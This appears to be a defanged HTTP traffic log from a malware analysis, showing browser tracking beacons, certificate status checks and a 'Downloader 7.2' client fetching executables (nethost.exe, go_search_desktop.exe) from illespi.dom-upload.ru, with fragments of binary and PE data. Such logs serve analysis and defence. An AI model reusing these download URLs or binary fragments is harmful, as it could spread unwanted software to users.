GET /update?rnd=451798608657&p=gomail3&t=gomail_main&v=0&i=renderdocument:782,static:550,jsinit:1 HTTP/1.1

Host: gomail.radar.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:34 GMT

Server: imagine/radar (5115861e)

Connection: close

X-Content-Type-Options: nosniff

Content-Length: 43

Content-Type: image/gif

GIF89a.............!.......,...........L..;..

GET /static/web/js/base.js?2657ceda HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
76ab...............v[I..w...N..@........8J..R.LI-)..C........ ...".k.s
..{..0W..5.Y./..b. ...$....q......z.~.@....c......Io9.Nj..h9...?./?...
O{'.z..}6.e.d.q.........~YOZ..f.J..<.....%j...[....5..F.~.....5..n.
..|k.../...zy=k...py....F.z.8i\^...nk@#....m .8Z,.=.........l>\....
....v[...E..~....8E...y>h\5....x..Y.4}.x}6.M...o3IN..$..y..ek. .n.N
N?..rfc./...[[.......O...l...&/.....Y^.*.......n.7...E'9..$_5.z..hf...
...b..|..l>.'.7.S .......g..V....gw...Fk9.a....o..Zvu..g.Q..t.df..p
/...0....V...ZK.8...e....|w6..s..t.u...7w5.O..|.(w.t>.........b9...
g..r....OA.~...v...i.~..T..^,....>.v...p,..........G..x:.....v.tV,.
f...M...>5.o~.M....G..d3....i.?{......N.#i'...a]mp%..2..l..N:.]..NZ
.h.....h.....l.F:.............P....T.B....m.@6P.....".6Y..d.Z.`...;...
.....F..Eo>........,,...A.....(.m\t[...... ;./..4sM.......j_..~..B.
....E.ax..8...$.?.w.W......d@.'[....H{4... .v.M...d.@..../............
.=Z...Zw.?..f..)..~.....WF.BgWiy.E{.WC...~b..i..5..w....io.>.@2)...
O..z..Z..N.:.G.#..};ke....,...<I..h1...k..FR.5:.b.M@. ....&..... ?`
..N.......G.q^k....x49i....|....=i..h2.......P.bW.V..,sn..hBs9#... ..I
_...w..t~...~....R..~..Ua...l2;[.6).......'c:.n9...N.R...]O.hq@.....~&
gt;....X...2./*...K.Y.wg.......!.........--....7G9d....Z..k..=.-......
a......hw....|x....H..(.....g.BOV..c..A...2#.0H~5...O........Q.y..|..l
.\.pX..o,:ZH....x...^^....`7.5...t..1.5..Q\..}........Ag...,...v..\.}.
....[=.g..mF6a...}....i........_.l......r..*V.....&..)...3...w.M...h..
...u..I..t.,.#x.}.O.n...-cP......#....z.Cj..Y.HyyiDn..>....d..k<<< skipped >>>

GET /0c.gif?megarandom=507f606c18792767&h=l HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: keep-alive

Access-Control-Allow-Origin: hXXp://go.mail.ru

GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: ng
inx..Date: Mon, 23 Feb 2015 09:35:34 GMT..Content-Type: image/gif..Con
tent-Length: 43..Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT..Connect
ion: keep-alive..Access-Control-Allow-Origin: hXXp://go.mail.ru..GIF89
a.............!.......,...........L..;....

GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CByd0HN5byag= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:40 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=122186, public, no-transform, must-revalidate

Last-Modified: Mon, 23 Feb 2015 09:19:17 GMT

Expires: Tue, 24 Feb 2015 21:19:17 GMT

ETag: "1188d8f8dd51546e2cf4d2394897f0d2f0919f81"

Content-Length: 1895

Connection: close

Content-Type: application/ocsp-response

0..c......\0..X.. .....0.....I0..E0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$http:/
/certs.godaddy.com/repository/1 0)..U..."Go Daddy Validation Authority
 - G2..20150223091917Z0j0h0@0... ..........._lkv...8..f..R34N..@..'..4
.0.3..l...,....'t..[......20150223091917Z....20150224211917Z0...*.H...
..........6.y.\N.......#.c....%.....E&.w..]*p.s.6...c.3..oc8`......X..
.2.....q.*.].w..C......6O..h.Q....\....'>....3.I...c...8i.F#..!"...
W.....S.Xf.=y...~.._Ebh.`....%]."i.M..q.T*...\.9...*..i...........f..3
.#.3R...J.X...z..Q...&....% ...ITq.....!1oHc.MQ~  <:......*....0...
0...0..........$..0...*.H........0..1.0...U....US1.0...U....Arizona1.0
...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.
godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authorit
y - G20...140401070000Z..150401070000Z0..1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$hXXp://ce
rts.godaddy.com/repository/1 0)..U..."Go Daddy Validation Authority - 
G20.."0...*.H.............0..........?.........'' ...X....0.........T.
.W............,\...zZ./h....W......>.......Z..K....n..$Us..Y..e..b_
I|T.....$.>....%D$.3..$....*.|)........S..$A.e<...r..rE)....(...
C[V.........~`C.........L....\....W......M....w.Zk......h. i.....J..n.
........u.....K)...E.........0...0...U.......0.0...U...........0...U.%
..0... ......... .......0...U......wI.p......!.(..d.tT(0...U.#..0...@.
.'..4.0.3..l...,..0... .....0......01..U...*0(0&.$.". hXXp://crl.g

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=340814, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 08:12:19 GMT

Expires: Fri, 27 Feb 2015 08:12:19 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0081219Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U....:.q..E...0.xa......20150220081219Z....20150227081219Z0...*.H.....
........./Ql[......[d"|...).hW.,5....U.ez.v?R.v&?.r....=..i...'.....V.
h_R.0...|.N.bI.5.b.K.:$K.[B......f.....u$=@.6.GE..J..*C.o!..hD.(<.\
...vC]X.@.r6.B......\.. .,.L..%..p....I.>....).y!...c.K:?....xS7^..
]..# .......2]..U......(...bq..........V>..},^.G................0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1453

content-transfer-encoding: binary

Cache-Control: max-age=547780, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 17:38:06 GMT

Expires: Sun, 1 Mar 2015 17:38:06 GMT

Date: Mon, 23 Feb 2015 09:31:32 GMT

Connection: keep-alive

0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....2015022
2173806Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a.
.%...0a.. ...M|......20150222173806Z....20150301173806Z0...*.H........
.....R.I.R.&..$g...7.A0}wJ.A=c.....-F..Nl.sx....bi..$...cVq......Sw@..
O..j.d.E.....X.H .y.{Y..../...W..Q...[.L#.M..z....T.....L_.q..ID....XW
.F@.P.A.(2$.V....8....R...T. ).$B..f1...R.......vKL.u.c....P6..G..k$jG
.g..s4..2..G.6..O.@..[....5.m..'......?. 9..DU.HQ.N....0...0...0..3...
..../...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSign,
 Inc.1705..U....Class 3 Public Primary Certification Authority0...1412
02000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporatio
n1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G1
 OCSP Responder Certificate 30.."0...*.H.............0..........'.....
.Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; )....
.0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p..^|
o....S..v.).).....r.v.qo$......C.V!....@.h#qh...u1T.].G0.]E...=._.....
. ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. .e0
c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......
0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .
....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$..H
......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D.....
......e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,....

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEG7MeqWnAyAJuM689OlS1JE= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1762

content-transfer-encoding: binary

Cache-Control: max-age=468011, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 19:27:53 GMT

Expires: Sat, 28 Feb 2015 19:27:53 GMT

Date: Mon, 23 Feb 2015 09:31:32 GMT

Connection: keep-alive

0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..2015022
1192753Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..n.z... ......R......20150221192753Z....20150228192753Z0...*.H.....
.........A...I...b..F.....V..'..........~ F.&..qO......G.,.-.$.....HX^
X....U.Knw...-..Z...1.E..].I{.y...^=...6,.c_.kA.7.w.[.a.#.W}Z......Pld
.E\.I....0..<.....aR...~.T.)L....Y..."..!..-..F....9..Zz..)....0..m
X`.....F.E...6H.*h,..,....n6.."....~........ ......^DQl......0...0...0
...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriS
ign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Publ
ic Primary Certification Authority - G50...141202000000Z..151216235959
Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Tr
ust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Certifi
cate 30.."0...*.H.............0...............2&..PL...,..2....:..tH..
.`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s.....
3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$"..$l
.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.6.p
r4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E....0R
0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.sym
auth.com/rpa0...U.%..0... .......0...U...........0... .....0......0!..
U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U.#.
.0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5.N.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEBJb7jD8sX/Xvx/0GcknQyc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1730

content-transfer-encoding: binary

Cache-Control: max-age=396505, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 23:37:52 GMT

Expires: Fri, 27 Feb 2015 23:37:52 GMT

Date: Mon, 23 Feb 2015 09:31:32 GMT

Connection: keep-alive
0..........0..... .....0......0...0......P).Niz5............?..2015022
0233752Z0s0q0I0... ..........)8t..).~.5bRd.S......D\.SD..~. .%..c..y..
..[.0.........'C'....20150220233752Z....20150227233752Z0...*.H........
...............O.B..YV.........p..r... ......c_W....Q.......NS...Ua.F.
YS]c.........@..U....MU..}.h*...^.p=.l...6..$Yr.t.n.Ed....UX..]......z
K....%.{...n.^...'<..S..~..{...GGC85..... U??.=.[.J....5..fa...p~W{
@..Q.......@......u..9...W...{r..d..e.... '.q.1.2..n1.....0...0...0...
.......]../g.0.h.....$C0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)101/0-..U...&VeriSign Class 3 Secure Se
rver CA - G30...141204000000Z..150304235959Z0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1>0<..U...5VeriS
ign Class 3 Secure Server CA - G3 OCSP Responder0.."0...*.H...........
..0............Q..>.]....b...........G[..sz_:.eM.J..m)....J.KV..W..
..e.M...C.......8.|...^...S./.r.KOv.&...OVW....rG.@...e...:S4....R..&"
......l.....1&..nY..p.....4...L`.g...E#t....Mw....1.O.....i..e.b.qa...
p.....$...b...V....#.M3......|..B.R..:@UtY@:s..h.........me..........0
...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://w
ww.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's C
PS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......
0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-24570...
*.H.............y.boc.....2<.-..O...ehR.............. .....n...<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEElf2B2zS0yDvnMYzCuOCTI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1730

content-transfer-encoding: binary

Cache-Control: max-age=365177, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 14:57:45 GMT

Expires: Fri, 27 Feb 2015 14:57:45 GMT

Date: Mon, 23 Feb 2015 09:31:44 GMT

Connection: keep-alive
0..........0..... .....0......0...0......P).Niz5............?..2015022
0145745Z0s0q0I0... ..........)8t..).~.5bRd.S......D\.SD..~. .%..c..y..
.I_...KL..s.. ..2....20150220145745Z....20150227145745Z0...*.H........
.....B|..l..?.~...........cNDqx.2#<n... . ....mJ.Ih.<`AQ0c...`.!
4...<k....1.9Rw.?D.. ....X.....p...1....V..R.&J..........t.."...*..
$.^>GY.....h)I....'hu.LV.)......:h....4Sf.0.]..WI...%..........1J].
.=...t...yb....S$P...%.t>..<....-3..2x.3.....u....PM,.....B..p..
...0...0...0..........]../g.0.h.....$C0...*.H........0..1.0...U....US1
.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Te
rms of use at hXXps://VVV.verisign.com/rpa (c)101/0-..U...&VeriSign Cl
ass 3 Secure Server CA - G30...141204000000Z..150304235959Z0..1.0...U.
...US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1>0&
lt;..U...5VeriSign Class 3 Secure Server CA - G3 OCSP Responder0.."0..
.*.H.............0............Q..>.]....b...........G[..sz_:.eM.J..
m)....J.KV..W....e.M...C.......8.|...^...S./.r.KOv.&...OVW....rG.@...e
...:S4....R..&"......l.....1&..nY..p.....4...L`.g...E#t....Mw....1.O..
...i..e.b.qa...p.....$...b...V....#.M3......|..B.R..:@UtY@:s..h.......
..me..........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. ...
......hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0...
..=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.
%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U...
.TGV-B-24570...*.H.............y.boc.....2<.-..O...ehR.........<<< skipped >>>

GET /sputnik/spmrids.mrdj?osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&tool=sputnik&guid=&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=9 HTTP/1.1

Host: xml.binupdate.mail.ru

Accept: */*

User-Agent: SputnikInstaller

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-mrd

Connection: close

Content-Transfer-Encoding: 8bit

Content-Length: 1564
d.=<;:;\ds7.3i.0/.-, *)*Feqqbn#:..WY__US_W[QU_R^_O]\MBHKODUJOJNM>
;7.pQzyxwvutsp.&=.5%..:..51fyb.J_^]\[ZYXWVUTQ.........................
......................................................................
...................................................?>=>Ni|Hvbv|z
|v25.y~~o%.'&%$#"! .kOP...._BAD...H[@@MBF[].EAJNCHLq,(s<5.;?.!:g|f*
mDmlkj4dMfedc`.0]D].qZYXWVUTSP0.....IPIJ..............................
......................................................................
...................................zwp~qtxzxy{}c{pqdah`)&.('&%$#"! ...
.RWRU_TWSYUZRD^LFFDOMBDAKGDBE3391yPyxwvutsr.|Enmlkjihgd.7&. 4.....XCX.
..._xQPONMLKJK=..G^C@.................................................
......................................................................
..........?<Rji_aq^rfXzae25.V. *)('&%$#"! .V^RXPI_VXS[PPW_J@LIFKNBM
IUOHKOD/|qV{zyxwvutsrqpm-!</-$,," -)(#'.................LAfKJIHGFED
CBA@..................................................................
.............................................................xv?0.:987
6543210/,idembx`bgtainpQZQLPSZ^V_SRCZU[MA..!............|;0460989<?
=>:?")$//%-)*",,-* '.._PqZYXWVUTSRQPOL.............................
......................................................................
..........................................o$23cnwuv.yff<rtacleg${}(
aj[`jwbR...A.3....I.8...hkiS^LFTOJJP...$T}|{z{...%!'<8;mtm7Ajihgfef
.0-bE^_....BXY.........B.......J..N...................................
..................................................................<<< skipped >>>

GET /nethost.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: illespi.dom-upload.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:33:17 GMT

Content-Type: application/octet-stream

Content-Length: 1749504

Last-Modified: Tue, 17 Feb 2015 12:52:21 GMT

Connection: keep-alive

ETag: "54e33985-1ab200"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........I@..'...'.
..'.:.....'.......'.......'.......'.....{.'.......'...&...'.......'...
....'.......'.......'.......'.......'.......'.Rich..'.................
PE..L....(.T..........................................................
........... ......W.....@.........................P...0...P...........
 .......................`.............................................
.......................................text...........................
.... ..`.rdata...T.......V..................@..@.data........ ...v....
..............@....rsrc... ............t..............@..@.reloc...6..
.....8...z..............@..B..........................................
......................................................................
......................................................................
......................................................................
............................................U..j.hIf..d.....P...VW..G.
.3.P.E.d......u.3..E..F......F....E..C. ..~..E.....;.w&9F.t!j.P.......
..t..~...~.r.........8....K.3. .tO....?...q..2.8.M..N....r........F...
...r.........t. ..U.Rj.P...k......K.G .;.r....M.d......Y_^..].........
....U..j.h0o..d.....P..8..G..3..E.SVP.E.d......E.jhP......M.Q.]..E....
..........E...x..r...j.P.E..E.......V......}....r..U.R..w......E.3..E.
.....M..M.;.t.P..w........M.d......Y^[.M.3...w....].....U.....j.hv}..d
.....P........G..3...$....SVW..G..3.P..$....d......D$4jgP.......$.

<<< skipped >>>

GET /index.html?aid=343341&label=operasoft-sdO15-343341-&utm_source=Opera&utm_medium=web&utm_campaign=sdO15 HTTP/1.1

Host: VVV.booking.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:39 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: private

Vary: User-Agent, Accept-Encoding

Content-Encoding: gzip

Set-Cookie: bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDWuLLIYaigN5kH5Ge/p/BkhK3qh9ILqEgPc0B+8JCLmZ4Wfhuew7Z5g7EnlIHqltdMPpYhSqCwnpijytMsTd7EU36rytouWg5p/cdgRCweXtPqH55cxEWQpj1/SQwuZY65++W/w+FyNmiwmHeBemNM4HohNcyhf/M; domain=.booking.com; path=/; expires=Sat, 22-Feb-2020 09:35:39 GMT; HTTPOnly
4ca.............V[o.6.~..`..%.dQ..r.......V`...(.^.m"..JT.....a....{..
.E~<...;..........'d...jv.(.g/.D.;.#78Pnj4.@6...6..V..H.....M.&.#n.
.....?...dk...0.M..H..4......-..p.......-..l.}.L..n...hAx.\.,.k.Y.#..u
..n.....1....._En.$..n./ZH.qN.|8..9'..k4.ADr..G3..q\E...o".j;.......B.
.........A,........t....1.}..:o.....#.M.....*:p..m..d.A%..n.1.m...$.]-
xq.H..'.f.)4....M..9|.".{..0^.....~5y...$heT.......L...ug....7b ~$ .s.
;.Xx8;........tB?.-...........q....wg;.i.;.......1^.d.f.....q..#..8...
:...h.[u...a..1i....7......Pe.J^VF..dR.2/y-%.i....L..n.s....>{.....
..U5.8..1.....P.H.1TgE..*.R~..O.`..4....92aeY.L3H.*5e.5.E..V"..Wi.....
.........b...CU)5e....H.*..5e..RqZP.cT..r.....W.@.]...^ZC.O.>!.....
.3.P5.....4.r. ..d..YQ..eQ.. UK].F..Pw|.."H......_B..y.M.\.B...X(.0.E.
z..../d..j.....]?....6.Z.u}.#o....K".~ .\/..7..._.w.......[....F...-..
%.VM..@T^`x...F-...eZgFU.R&2`...2..s\......`)..Z;&.Bf.W_F.Sb.P..D...%.
.....:S...U.eYV..LE.d....cv.....?.&.4k$..Vi.!7E...5Z.:cU.x.X....[hV?.f
.N.........V*Y..k.MM*.*E.T..5.B..8......e`...3...\.K.RN.....d...@^Q...
......2.K1Z|......Z1ll.$....~AS.9...........x..0~Y....N.,...R.........
..M..[..._.".~d..6... .].c;'..C......d.W.....s......k.4k.L..B.*W.@.r..
d.J.......HSQ1...}...1c=...{.....6........../.......d3ae.............@
.C..w.3......y....rH..s8C...P.zuwq...U.3..K`.2 @.>.... ....,..!Y6|w
........O...............W?.......3...........&.C....v..tPi.. C/...eC.&
lt;.M...._.f..Zc....m...oVYC\.q...Z.8I......k..@;...E......W..:.. ...L
t..{.....D.>.=%..\<.|.... %.!.l6.pq.}..N.(..8d...N/.|l.A.f A<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com



.TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...
~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a
..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4.
...RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O
.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*
&-8-

GET /go_search_desktop.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: illespi.dom-upload.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: application/octet-stream

Content-Length: 1020384

Last-Modified: Mon, 29 Dec 2014 11:44:47 GMT

Connection: keep-alive

ETag: "54a13eaf-f91e0"

